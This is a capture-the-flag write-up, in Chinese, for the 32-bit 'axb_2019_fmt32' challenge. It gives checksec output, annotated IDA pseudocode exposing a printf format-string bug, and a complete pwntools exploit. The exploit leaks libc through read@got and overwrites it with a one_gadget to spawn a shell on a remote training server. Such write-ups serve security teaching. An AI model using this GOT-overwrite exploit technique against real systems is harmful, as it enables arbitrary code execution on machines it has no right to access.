
axb_2019_fmt32

Ubuntu 16.04（glibc 2.23，对应下文 exp 中加载的 libc-2.23.so）


0x01


checksec

[*] '/home/zelas/Desktop/pwn/axb_2019_fmt32/axb_2019_fmt32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

IDA

/*
 * IDA pseudocode of the challenge's main(). The program echoes user input
 * back through printf() with the user-controlled buffer used as the format
 * string, which is the bug the exploit below relies on.
 */
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
char s[257]; // [esp+Fh] [ebp-239h] BYREF   -- raw input; read() fills at most 0x100 of 257 bytes
char format[300]; // [esp+110h] [ebp-138h] BYREF   -- "Repeater:" + s + "\n"; this is what printf() gets as its format
unsigned int v5; // [esp+23Ch] [ebp-Ch]

// gs:0x14 is the stack-canary slot. main never returns (exit() below), so no
// check of v5 appears in this listing; checksec reporting "No canary found"
// is consistent with the check having been dropped.
v5 = __readgsdword(0x14u);
setbuf(stdout, 0);
setbuf(stdin, 0);
setbuf(stderr, 0);
puts(
"Hello,I am a computer Repeater updated.\n"
"After a lot of machine learning,I know that the essence of man is a reread machine!");
puts("So I'll answer whatever you say!");
while ( 1 )
{
// Re-armed on every iteration: each round trip of the exploit has a 3 s budget.
alarm(3u);
// Both buffers are zeroed each round, so s is always NUL-terminated after read().
memset(s, 0, sizeof(s));
memset(format, 0, sizeof(format));
printf("Please tell me:");
read(0, s, 0x100u);
// Bounded: 9 ("Repeater:") + at most 256 + 1 ("\n") = 266 bytes into a 300-byte buffer, no overflow here.
sprintf(format, "Repeater:%s\n", s);
// 0x10E = 270 exceeds the 266-byte maximum computed above, so this exit path
// appears to be unreachable; the loop only ends via the alarm or the exploit.
if ( strlen(format) > 0x10E )
break;
printf(format); // BUG: user-controlled format string. With Partial RELRO the GOT is writable, so %n-style writes can hijack read@got.
}
printf("what you input is really long!");
exit(0);
}

0x02


思路 fmtstr

1. 泄露 libc：利用格式化字符串漏洞，用 `%8$s` 读取 read@got 中的地址，减去 libc 中 read 的偏移得到 libc 基址。

2. 用 fmtstr_payload 通过同一个漏洞把 read@got 改写为 one_gadget 地址，循环中下一次调用 read 时即执行 one_gadget 拿到 shell。

0x03


exp

from pwn import *

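# 32-bit target with no PIE (see checksec), so GOT addresses are fixed and
# contain no NUL bytes and can be embedded in a printf format string.
context(os='linux', arch='i386', log_level='debug')
path = './axb_2019_fmt32'
# `python exp.py LOCAL` runs the binary locally; the default is the remote instance.
if args.LOCAL:
    io = process([path])
else:
    io = remote("node4.buuoj.cn", 27912)
elf = ELF(path)
# Must be the exact libc of the target: both the read() offset and the
# one_gadget offset below are taken from this build.
libc = ELF("libc-2.23.so")

# Stage 1: leak libc through the format string bug in printf(format).
# The program prepends "Repeater:" (9 bytes) to the input; the leading 'a'
# is padding so that the GOT address lands in the 4-byte slot printf sees as
# argument 8, which %8$s then dereferences.
read_got = elf.got['read']
payload = flat(b'a', read_got, b'%8$s')
# The binary re-arms alarm(3) on every loop iteration: each exchange has a 3 s budget.
io.sendafter(b'me:', payload)
# The echo is "Repeater:" + 'a' + <GOT address bytes> + <4 bytes of read@libc>.
# Consume the echoed prefix explicitly rather than recv(18)[-4:], which
# silently yields garbage whenever a network read returns fewer than 18 bytes.
io.recvuntil(b'Repeater:a' + p32(read_got))
read_addr = u32(io.recvn(4))
print('[+] read_address', hex(read_addr))
# %s stops at the first NUL byte, so a libc address containing 0x00 would be
# truncated. The page offset of read() is unaffected by ASLR, so this cheap
# check catches a truncated leak or a wrong libc file before the GOT is corrupted.
if read_addr & 0xfff != libc.symbols['read'] & 0xfff:
    log.error('leaked read address %#x does not match libc-2.23.so (wrong libc or truncated leak)', read_addr)
libc_base = read_addr - libc.symbols['read']
# execve("/bin/sh") gadget offset for this libc-2.23.so build; its register
# constraints must hold at the hijacked read() call, otherwise try another offset.
one_gadget = libc_base + 0x3a80c

# Stage 2: overwrite read@got with the one_gadget via the same bug.
# numbwritten=0xa accounts for "Repeater:" + 'a' already emitted before the
# format string's own output. Partial RELRO leaves the GOT writable; the next
# read(0, s, 0x100) in the loop then jumps into the gadget.
payload1 = flat(b'a', fmtstr_payload(8, {read_got: one_gadget}, 0xa))
io.sendafter(b'me:', payload1)

io.interactive()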

